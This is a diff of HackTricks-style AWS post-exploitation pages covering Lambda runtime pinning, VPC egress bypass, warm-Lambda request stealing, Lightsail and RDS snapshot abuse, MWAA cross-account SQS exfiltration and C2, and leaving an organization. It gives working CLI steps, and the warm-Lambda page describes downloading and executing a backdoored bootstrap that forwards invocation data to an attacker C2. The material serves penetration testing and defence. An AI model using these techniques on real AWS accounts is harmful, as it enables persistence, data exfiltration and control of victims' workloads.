+Abuse `lambda:PutRuntimeManagementConfig` to pin a function version to a specific runtime version (`Manual`) or defer runtime updates until the function is updated (`FunctionUpdate`). `Manual` uses the selected runtime indefinitely, while `FunctionUpdate` applies the latest runtime when the function is updated.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Abuse `lambda:PutRuntimeManagementConfig` to pin a function to a specific runtime version (Manual) or freeze updates (FunctionUpdate). This preserves compatibility with malicious layers/wrappers and can keep the function on an outdated, vulnerable runtime to aid exploitation and long-term persistence.
+Manual mode can leave a function on an outdated or vulnerable runtime without automatic runtime updates.<sup>[[1]](#references)[[2]](#references)</sup> In a compromise, that can preserve compatibility with malicious layers or wrappers and aid exploitation or long-term persistence.
 
-Requirements: `lambda:InvokeFunction`, `logs:FilterLogEvents`, `lambda:PutRuntimeManagementConfig`, `lambda:GetRuntimeManagementConfig`.
+For the full workflow below, the principal needs `lambda:InvokeFunction`, `logs:FilterLogEvents`, `lambda:PutRuntimeManagementConfig`, and `lambda:GetRuntimeManagementConfig`. The first two permissions support invoking the function and reading its log events; the latter two authorize changing and verifying its runtime-management configuration.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
 Example (us-east-1):
-- Invoke: `aws lambda invoke --function-name  /tmp/ping.json --payload {} --region us-east-1 > /dev/null; sleep 5`
-- Freeze updates: `aws lambda put-runtime-management-config --function-name  --update-runtime-on FunctionUpdate --region us-east-1`
-- Verify: `aws lambda get-runtime-management-config --function-name  --region us-east-1`
+- Set the target: `TARGET_FN="<FUNCTION_NAME>"`
+- Invoke: `aws lambda invoke --function-name "$TARGET_FN" --payload '{}' --cli-binary-format raw-in-base64-out --region us-east-1 /tmp/ping.json > /dev/null; sleep 5`.<sup>[[5]](#references)</sup>
+- Defer automatic updates until a function update: `aws lambda put-runtime-management-config --function-name "$TARGET_FN" --update-runtime-on FunctionUpdate --region us-east-1`.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
+- Verify: `aws lambda get-runtime-management-config --function-name "$TARGET_FN" --region us-east-1`.<sup>[[7]](#references)</sup>
 
-Optionally pin to a specific runtime version by extracting the Runtime Version ARN from INIT_START logs and using `--update-runtime-on Manual --runtime-version-arn <arn>`.
+Optionally pin to a specific runtime version by extracting the Runtime Version ARN from an `INIT_START` log line and using `--update-runtime-on Manual --runtime-version-arn <arn>`. Lambda emits the runtime version and ARN in `INIT_START` when it creates a new execution environment, so a warm invocation might not produce a new line.<sup>[[1]](#references)[[8]](#references)</sup>
+
+## References
+
+- [1] [PutRuntimeManagementConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_PutRuntimeManagementConfig.html)
+- [2] [Understanding how Lambda manages runtime version updates - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-update.html)
+- [3] [Actions, resources, and condition keys for AWS Lambda - Service Authorization Reference](https://docs.aws.amazon.com/service-authorization/latest/reference/list_lambda.html)
+- [4] [FilterLogEvents - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_FilterLogEvents.html)
+- [5] [invoke - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/invoke.html)
+- [6] [put-runtime-management-config - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/put-runtime-management-config.html)
+- [7] [get-runtime-management-config - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/get-runtime-management-config.html)
+- [8] [Identifying Lambda runtime version changes - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/runtime-management-identify.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md
@@ -1,18 +1,18 @@
-# AWS Lambda – VPC Egress Bypass by Detaching VpcConfig
+# AWS Lambda – VPC Egress Bypass by Detaching `VpcConfig`
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Force a Lambda function out of a restricted VPC by updating its configuration with an empty VpcConfig (SubnetIds=[], SecurityGroupIds=[]). The function will then run in the Lambda-managed networking plane, regaining outbound internet access and bypassing egress controls enforced by private VPC subnets without NAT.
+Force a Lambda function out of a customer VPC by updating its `VpcConfig` with empty `SubnetIds` and `SecurityGroupIds`. AWS documents this exact command for detaching a function; Lambda functions have public-internet connectivity by default, while a function attached to a customer VPC can reach resources and the internet only through that VPC.<sup>[[1]](#references)[[2]](#references)</sup> This changes the customer-VPC attachment, not the Lambda service's underlying managed VPC.<sup>[[1]](#references)</sup>
 
 ## Abusing it
 
-- Pre-reqs: lambda:UpdateFunctionConfiguration on the target function (and lambda:InvokeFunction to validate), plus permissions to update code/handler if changing them.
-- Assumptions: The function is currently configured with VpcConfig pointing to private subnets without NAT (so outbound internet is blocked).
-- Region: us-east-1
+- Pre-reqs: `lambda:UpdateFunctionConfiguration` and `lambda:GetFunctionConfiguration` on the target function, plus `lambda:InvokeFunction` to validate. If changing a zip package or handler, also require `lambda:UpdateFunctionCode` and the already-listed configuration permission, respectively.<sup>[[3]](#references)[[5]](#references)</sup>
+- Assumptions: The function is currently configured with `VpcConfig` pointing to private subnets without a usable NAT/egress route, so the HTTP probe cannot reach the public internet through that VPC.<sup>[[1]](#references)[[7]](#references)</sup>
+- Region: set `$REGION` to the target function's region; the examples use us-east-1.
+
+The update applies to the unpublished `$LATEST` configuration; published versions cannot be modified in place.<sup>[[2]](#references)[[6]](#references)</sup>
 
 ### Steps
 
-0) Prepare a minimal handler that proves outbound HTTP works
+0) (Optional) For a zip-based Python function, prepare a minimal handler that proves outbound HTTP works. Updating the zip package replaces the unpublished function code, and the configuration update selects the handler.<sup>[[2]](#references)[[4]](#references)</sup> If this step is skipped, invoke an existing handler that can perform the same egress test.
 
     cat > net.py <<'PY'
     import urllib.request, json
@@ -25,42 +25,79 @@ Force a Lambda function out of a restricted VPC by updating its configuration wi
             return {"egress": False, "err": str(e)}
     PY
     zip net.zip net.py
-    aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://net.zip --region $REGION || true
-    aws lambda update-function-configuration --function-name $TARGET_FN --handler net.lambda_handler --region $REGION || true
+    aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://net.zip --region "$REGION"
+    aws lambda wait function-updated-v2 --function-name "$TARGET_FN" --region "$REGION"
+    aws lambda update-function-configuration --function-name "$TARGET_FN" --handler net.lambda_handler --region "$REGION"
+    aws lambda wait function-updated-v2 --function-name "$TARGET_FN" --region "$REGION"
 
 1) Record current VPC config (to restore later if needed)
 
-    aws lambda get-function-configuration --function-name $TARGET_FN --query 'VpcConfig' --region $REGION > /tmp/orig-vpc.json
+    aws lambda get-function-configuration --function-name "$TARGET_FN" --query 'VpcConfig' --region "$REGION" > /tmp/orig-vpc.json
     cat /tmp/orig-vpc.json
 
 2) Detach the VPC by setting empty lists
 
+AWS documents the following empty-list `--vpc-config` value for detaching a function from a VPC.<sup>[[1]](#references)[[6]](#references)</sup>
+
     aws lambda update-function-configuration \
-      --function-name $TARGET_FN \
+      --function-name "$TARGET_FN" \
       --vpc-config SubnetIds=[],SecurityGroupIds=[] \
-      --region $REGION
-    until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+      --region "$REGION"
+
+Wait for `LastUpdateStatus` to become `Successful`; stop on `Failed` instead of looping forever. The API reports `Successful`, `Failed`, and `InProgress` states for the last update.<sup>[[2]](#references)[[6]](#references)</sup>
+
+    while :; do
+      status=$(aws lambda get-function-configuration \
+        --function-name "$TARGET_FN" \
+        --query 'LastUpdateStatus' --output text --region "$REGION")
+      case "$status" in
+        Successful) break ;;
+        Failed) echo "Lambda update failed" >&2; exit 1 ;;
+        InProgress) sleep 2 ;;
+        *) echo "Unexpected LastUpdateStatus: $status" >&2; exit 1 ;;
+      esac
+    done
 
 3) Invoke and verify outbound access
 
-    aws lambda invoke --function-name $TARGET_FN /tmp/net-out.json --region $REGION >/dev/null
+The `Invoke` API requires `lambda:InvokeFunction` for this validation step.<sup>[[3]](#references)[[5]](#references)</sup>
+
+    aws lambda invoke --function-name "$TARGET_FN" /tmp/net-out.json --region "$REGION" >/dev/null
     cat /tmp/net-out.json
 
 (Optional) Restore original VPC config
 
     if jq -e '.SubnetIds | length > 0' /tmp/orig-vpc.json >/dev/null; then
       SUBS=$(jq -r '.SubnetIds | join(",")' /tmp/orig-vpc.json); SGS=$(jq -r '.SecurityGroupIds | join(",")' /tmp/orig-vpc.json)
-      aws lambda update-function-configuration --function-name $TARGET_FN --vpc-config SubnetIds=[$SUBS],SecurityGroupIds=[$SGS] --region $REGION
+      IPV6=$(jq -r '.Ipv6AllowedForDualStack // false' /tmp/orig-vpc.json)
+      aws lambda update-function-configuration \
+        --function-name "$TARGET_FN" \
+        --vpc-config "SubnetIds=[$SUBS],SecurityGroupIds=[$SGS],Ipv6AllowedForDualStack=$IPV6" \
+        --region "$REGION"
     fi
 
 ### Impact
-- Regains unrestricted outbound internet from the function, enabling data exfiltration or C2 from workloads that were intentionally isolated in private subnets without NAT.
+- Removes the customer VPC's routes, security groups, and NAT dependency from the function's network path, normally restoring Lambda's default public-internet connectivity. An attacker can use that path for data exfiltration or C2 if the function's code and credentials permit it.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
+
+- Detaching a function can leave a Hyperplane ENI pending cleanup: Lambda says it may take up to 20 minutes to delete the attached ENI, and the function's execution role must remain available for that deletion.<sup>[[1]](#references)</sup>
 
 ### Example output (after detaching VpcConfig)
 
     {"egress": true, "ip": "34.x.x.x"}
 
 ### Cleanup
+
 - If you created any temporary code/handler changes, restore them.
 - Optionally restore the original VpcConfig saved in /tmp/orig-vpc.json as shown above.
+
+## References
+
+- [1] [Giving Lambda functions access to resources in an Amazon VPC - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-vpc.html)
+- [2] [UpdateFunctionConfiguration - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionConfiguration.html)
+- [3] [Invoke - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_Invoke.html)
+- [4] [update-function-code - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/update-function-code.html)
+- [5] [Actions, resources, and condition keys for AWS Lambda](https://docs.aws.amazon.com/service-authorization/latest/reference/list_lambda.html)
+- [6] [update-function-configuration - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/update-function-configuration.html)
+- [7] [Enable internet access for VPC-connected Lambda functions - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-vpc-internet.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
@@ -1,41 +1,39 @@
 # AWS - Steal Lambda Requests
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Lambda Flow
 
-<figure><img src="../../../../images/image (341).png" alt=""><figcaption><p><a href="https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png">https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png</a></p></figcaption></figure>
+<figure><img src="../../../../images/image (341).png" alt=""><figcaption><p><a href="https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png">https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png</a><sup>[[2]](#references)</sup></p></figcaption></figure>
 
-1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process.
-2. The init process listens on port **9001** exposing some interesting endpoints:
+1. **Slicer** is a process outside the container that sends **invocations** to the **init** process.<sup>[[1]](#references)</sup>
+2. The init process listens on port **9001** and exposes these runtime endpoints:<sup>[[1]](#references)[[3]](#references)</sup>
    - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event
    - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke
    - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error
-3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**).
-4. Finally, **bootstrap.py** sends to init the **response**
+3. **bootstrap.py** loops over invocations from the init process and calls the user's handler for each event (**`/next`**).<sup>[[3]](#references)[[4]](#references)</sup>
+4. Finally, **bootstrap.py** sends the handler's **response** back to init.<sup>[[3]](#references)[[4]](#references)</sup>
 
-Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
+The Python runtime loads the user's handler module and invokes the handler from this same bootstrap process, so code execution in the handler occurs in the runtime process.<sup>[[4]](#references)</sup>
 
 ## Stealing Lambda Requests
 
-The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process.
+The goal is to make the user's code execute a malicious **`bootstrap.py`** inside the legitimate runtime while it handles a vulnerable request. The malicious bootstrap then talks to the init process and handles later requests while the original bootstrap is trapped running it, so the original no longer polls for events.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
-This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could:
+This is possible because the user's handler executes inside the legitimate **`bootstrap.py`** process. An attacker could:<sup>[[1]](#references)[[4]](#references)</sup>
 
-- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.
-  - A request must be sent to **`/${invoke-id}/response`**
-  - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
-- Execute a malicious **`boostrap.py`** which will handle the next invocations
-  - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
-  - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
+- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.<sup>[[1]](#references)[[3]](#references)[[6]](#references)</sup>
+  - A request must be sent to **`/2018-06-01/runtime/invocation/${invoke-id}/response`**.<sup>[[3]](#references)</sup>
+  - The invoke ID can be obtained from the legitimate **`bootstrap.py`** stack using Python's [**inspect**](https://docs.python.org/3/library/inspect.html) module, as demonstrated by the [Twistlock PoC](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py), or by requesting `/2018-06-01/runtime/invocation/next` again as implemented in the [backdoored bootstrap](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py).<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
+- Execute a malicious **`bootstrap.py`** that handles subsequent invocations.<sup>[[1]](#references)[[7]](#references)</sup>
+  - For stealth, the malicious runtime can send invocation parameters to an attacker-controlled C2 and then handle requests as usual.<sup>[[1]](#references)[[7]](#references)</sup>
+  - For this attack, obtain the original **`bootstrap.py`** from the runtime or [**GitHub**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code, and run it from the current Lambda invocation.<sup>[[4]](#references)</sup>
 
 ### Attack Steps
 
-1. Find a **RCE** vulnerability.
-2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
-3. **Execute** the malicious bootstrap.
+1. Find a **RCE** vulnerability.<sup>[[1]](#references)</sup>
+2. Generate a **malicious** **bootstrap** (e.g. [the backdoored bootstrap](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)).<sup>[[7]](#references)</sup>
+3. **Execute** the malicious bootstrap.<sup>[[7]](#references)</sup>
 
-You can easily perform these actions running:
+The following example downloads and executes the referenced backdoored bootstrap; replace the collector URL with an authorized test endpoint before use.<sup>[[7]](#references)</sup>
 
 ```bash
 python3 <<EOF
@@ -54,14 +52,17 @@ exec(new_runtime)
 EOF
 ```
 
-For more info check [https://github.com/carlospolop/lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
+For more info check [the `lambda_bootstrap_switcher` repository](https://github.com/carlospolop/lambda_bootstrap_switcher).<sup>[[8]](#references)</sup>
 
 ## References
 
-- [https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
+- [1] [Gaining Persistency on Vulnerable Lambdas](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
+- [2] [Lambda runtime architecture diagram](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png)
+- [3] [Using the Lambda runtime API for custom runtimes](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html)
+- [4] [AWS Lambda Python Runtime Interface Client: bootstrap.py](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py)
+- [5] [inspect — Inspect live objects](https://docs.python.org/3/library/inspect.html)
+- [6] [lambda-persistency-poc: switch_runtime.py](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)
+- [7] [lambda_bootstrap_switcher: backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)
+- [8] [lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Lightsail Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Lightsail
 
 For more information, check:
@@ -12,12 +10,17 @@ For more information, check:
 
 ### Restore old DB snapshots
 
-If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it.
+If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**.
+
+AWS documents that a snapshot can be used to create a duplicate database; **restore** the snapshot in a **new database** and check it.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Restore Instance Snapshots
 
-Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\
-Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance.
+Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance.
+
+An instance snapshot is a point-in-time copy, so **create new instances from the snapshots** and check them.<sup>[[3]](#references)[[4]](#references)</sup>
+
+Alternatively, **export the snapshot to Amazon EC2**. An instance snapshot export produces an AMI and an EBS snapshot, which can then be used to create an EC2 instance; follow the steps of a typical EC2 instance.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### Access Sensitive Information
 
@@ -27,8 +30,16 @@ Check out the Lightsail privesc options to learn different ways to access potent
 ../../aws-privilege-escalation/aws-lightsail-privesc/README.md
 {{#endref}}
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Back up your Lightsail database with snapshots - Amazon Lightsail](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-creating-a-database-snapshot.html)
+- [2] [Create a managed database from a snapshot in Lightsail - Amazon Lightsail](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-creating-a-database-from-snapshot.html)
+- [3] [Back up Linux/Unix Lightsail instances with snapshots - Amazon Lightsail](https://docs.aws.amazon.com/lightsail/latest/userguide/lightsail-how-to-create-a-snapshot-of-your-instance.html)
+- [4] [Create Lightsail instances from snapshots - Amazon Lightsail](https://docs.aws.amazon.com/lightsail/latest/userguide/lightsail-how-to-create-instance-from-snapshot.html)
+- [5] [Export Lightsail snapshots to Amazon EC2 - Amazon Lightsail](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-exporting-snapshots-to-amazon-ec2.html)
+- [6] [Create Amazon EC2 instances from exported Lightsail snapshots - Amazon Lightsail](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-creating-ec2-instances-from-exported-snapshots.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-mwaa-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-mwaa-post-exploitation/README.md
@@ -1,10 +1,8 @@
 # AWS MWAA Execution Role Account Wildcard Vulnerability
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## The Vulnerability
 
-MWAA's execution role (the IAM role that Airflow workers use to access AWS resources) requires this mandatory policy to function:
+MWAA's execution role (the IAM role that Airflow workers use to access AWS resources) requires this SQS permission for task queueing.<sup>[[1]](#references)</sup>
 
 ```json
 {  
@@ -21,29 +19,42 @@ MWAA's execution role (the IAM role that Airflow workers use to access AWS resou
 }
 ```
 
-The wildcard (`*`) in the account ID position allows the role to interact with **any SQS queue in any AWS account** that starts with `airflow-celery-`. This is required because AWS provisions MWAA's internal queues in a separate AWS-managed account. There is no restriction on making queues with the `airflow-celery-` prefix. 
+This is the SQS statement in AWS's sample MWAA execution-role policies.<sup>[[1]](#references)</sup>
 
-**Cannot be fixed:** Removing the wildcard pre-deployment breaks MWAA completely - the scheduler can't queue tasks for workers.
+The `*` in the account-ID component matches the account portion of an SQS ARN, so the identity policy covers queues in other accounts when their names start with `airflow-celery-`. AWS documents that MWAA's service-owned queue may be in a third-party account and specifically warns that DAG code can access a matching queue there.<sup>[[1]](#references)[[4]](#references)</sup> SQS queue names may contain alphanumeric characters, hyphens, and underscores, so this prefix is not reserved by the naming rules.<sup>[[6]](#references)</sup>
 
-Documentation Verifying Vuln and Acknowledging Vectorr: [AWS Documentation](https://docs.aws.amazon.com/mwaa/latest/userguide/mwaa-create-role.html)
+Cross-account use still requires the destination queue's resource policy to grant the execution role access; an encrypted queue may additionally require its KMS key policy to allow the cross-account request.<sup>[[1]](#references)[[4]](#references)</sup>
+
+**Deployment caveat:** Removing the wildcard or another required permission before confirming the MWAA-owned queue account can stop task queueing. AWS notes that removing required execution-role permissions can make DAGs fail, but also documents how to update the role policy after creation; treat narrowing as a tested, post-deployment least-privilege change rather than an impossible fix.<sup>[[1]](#references)</sup>
+
+Documentation: [Amazon MWAA execution role](https://docs.aws.amazon.com/mwaa/latest/userguide/mwaa-create-role.html).<sup>[[1]](#references)</sup>
 
 ## Exploitation
 
-All Airflow DAGs run with the execution role's permissions. DAGs are Python scripts that can execute arbitrary code - they can use `yum` or `curl` to install tools, download malicious scripts, or import any Python library. DAGs are pulled from an assigned S3 folder and run on schedule automatically, all an attacker needs is ability to PUT to that bucket path.
+Airflow loads DAGs from Python source files and executes those files, and DAGs can run on a defined schedule.<sup>[[3]](#references)</sup> MWAA synchronizes DAGs placed in the environment's configured S3 bucket among workers, schedulers, and the webserver.<sup>[[2]](#references)</sup> Therefore, an attacker who can write or replace a DAG in that path can run Python code with the execution role's available permissions.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> DAG code can import installed dependencies or invoke tools available in the managed worker image; commands such as `yum` or `curl` are image-, permission-, and network-dependent rather than guaranteed.
 
-Anyone who can write DAGs (typically most users in MWAA environments) can abuse this permission:
+Anyone who can write or otherwise deploy a DAG can abuse this permission:
 
-1. **Data Exfiltration**: Create a queue named `airflow-celery-exfil` in an external account, write a DAG that sends sensitive data to it via `boto3`
+1. **Data Exfiltration**: Create a queue named `airflow-celery-exfil` in an external account and write a DAG that sends sensitive data to it via `boto3`. The queue policy must grant the execution role cross-account access.<sup>[[4]](#references)[[6]](#references)</sup>
 
-2. **Command & Control**: Poll commands from an external queue, execute them, return results - creating a persistent backdoor through SQS APIs
+2. **Command & Control**: Poll commands from an external queue, execute them, and return results, creating a persistent backdoor through SQS APIs.
 
-3. **Cross-Account Attacks**: Inject malicious messages into other organizations' queues if they follow the naming pattern
-
-All attacks bypass network controls since they use AWS APIs, not direct internet connections.
+3. **Cross-Account Attacks**: Inject malicious messages into other organizations' queues if they follow the naming pattern. The target queue policy must grant the execution role cross-account access.<sup>[[4]](#references)</sup>
 
 ## Impact
 
-This is an architectural flaw in MWAA with no IAM-based mitigation. Every MWAA deployment following AWS documentation has this vulnerability.
+This is a documented cross-account exposure in the AWS-owned-key sample policy, not an automatic compromise of every deployment. Exploitability still depends on DAG-code execution and the destination queue and, where applicable, KMS key policies; AWS recommends reviewing DAGs for arbitrary external queues and considering a customer-managed KMS key.<sup>[[1]](#references)[[4]](#references)</sup>
 
-**Network Control Bypass:** These attacks work even in private VPCs with no internet access. The SQS API calls use AWS's internal network and VPC endpoints, completely bypassing traditional network security controls, firewalls, and egress monitoring. Organizations cannot detect or block this data exfiltration path through network-level controls.
+**Network Control Bypass:** In a private-routing MWAA deployment without internet access, AWS documents an SQS VPC endpoint so the API calls can remain on a private AWS path.<sup>[[5]](#references)</sup> This bypasses direct-internet egress controls, but IAM, SQS queue policies, KMS key policies, and VPC endpoint policies remain enforcement points; organizations should not rely on internet firewalls alone to block or detect the path.<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[7]](#references)</sup>
+
+## References
+
+- [1] [Amazon MWAA execution role](https://docs.aws.amazon.com/mwaa/latest/userguide/mwaa-create-role.html)
+- [2] [Working with DAGs on Amazon MWAA](https://docs.aws.amazon.com/mwaa/latest/userguide/working-dags.html)
+- [3] [Dags — Apache Airflow Documentation](https://airflow.apache.org/docs/apache-airflow/stable/core-concepts/dags.html)
+- [4] [Overview of managing access in Amazon SQS](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-overview-of-managing-access.html)
+- [5] [Creating the required VPC service endpoints in an Amazon VPC with private routing](https://docs.aws.amazon.com/mwaa/latest/userguide/vpc-vpe-create-access.html)
+- [6] [Amazon SQS standard queue quotas](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/quotas-queues.html)
+- [7] [Security in your VPC on Amazon MWAA](https://docs.aws.amazon.com/mwaa/latest/userguide/vpc-security.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Organizations Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Organizations
 
 For more info about AWS Organizations check:
@@ -12,12 +10,24 @@ For more info about AWS Organizations check:
 
 ### Leave the Org
 
+A management account can remove a member account from the organization with its account ID.<sup>[[1]](#references)</sup>
+
 ```bash
-aws organizations deregister-account --account-id <account_id> --region <region>
+aws organizations remove-account-from-organization --account-id <account_id>
 ```
 
+A member account can remove itself by calling `leave-organization` without an account ID.<sup>[[2]](#references)</sup>
+
+```bash
+aws organizations leave-organization
+```
+
+The account must have the information required to operate as a standalone account, and a delegated administrator must be changed to another member account before removal.<sup>[[1]](#references)[[2]](#references)</sup>
+
+## References
+
+- [1] [remove-account-from-organization — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/organizations/remove-account-from-organization.html)
+- [2] [leave-organization — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/organizations/leave-organization.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - RDS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## RDS
 
 For more information check:
@@ -12,7 +10,7 @@ For more information check:
 
 ### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
 
-If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
+If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, then restoring a new instance from the snapshot with public connectivity and changing its master password.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 aws rds describe-db-instances # Get DB identifier
@@ -27,7 +25,7 @@ aws ec2 describe-security-groups
 
 aws rds restore-db-instance-from-db-snapshot \
     --db-instance-identifier "new-db-not-malicious" \
-    --db-snapshot-identifier <scapshotId> \
+    --db-snapshot-identifier <snapshot-id> \
     --db-subnet-group-name <db subnet group> \
     --publicly-accessible \
     --vpc-security-group-ids <ec2-security group>
@@ -41,7 +39,7 @@ aws rds modify-db-instance \
 ```
 
 ### `rds:StopDBCluster` & `rds:StopDBInstance`
